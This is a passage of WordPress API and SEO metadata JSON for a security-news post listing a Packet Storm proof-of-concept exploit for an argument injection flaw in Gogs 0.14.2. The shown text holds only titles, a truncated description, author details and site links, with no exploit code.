redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=62296","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338 - zero redgem","og_description":"{“lastseen”:”2026-06-12T16:32:18″,”description”:”Proof of concept exploit for an argument injection vulnerability in Gogs versions 0.14.2 and below and versions 0.15.0+dev and below…”,”published”:”2026-06-12T00:00:00″,”modified”:”2026-06-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Gogs 0.14.2 Argument Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:223338″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================n |...","og_url":"https:\/\/zero.redgem.net\/?p=62296","og_site_name":"zero redgem","article_published_time":"2026-06-12T12:42:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=62296#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=62296"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338","datePublished":"2026-06-12T12:42:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=62296"},"wordCount":3504,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=62296#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=62296","url":"https:\/\/zero.redgem.net\/?p=62296","name":"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-12T12:42:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=62296#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=62296"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=62296#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Gogs 0.14.2 Argument Injection_PACKETSTORM:223338"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/62296","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=62296"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/62296\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=62296"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=62296"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=62296"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}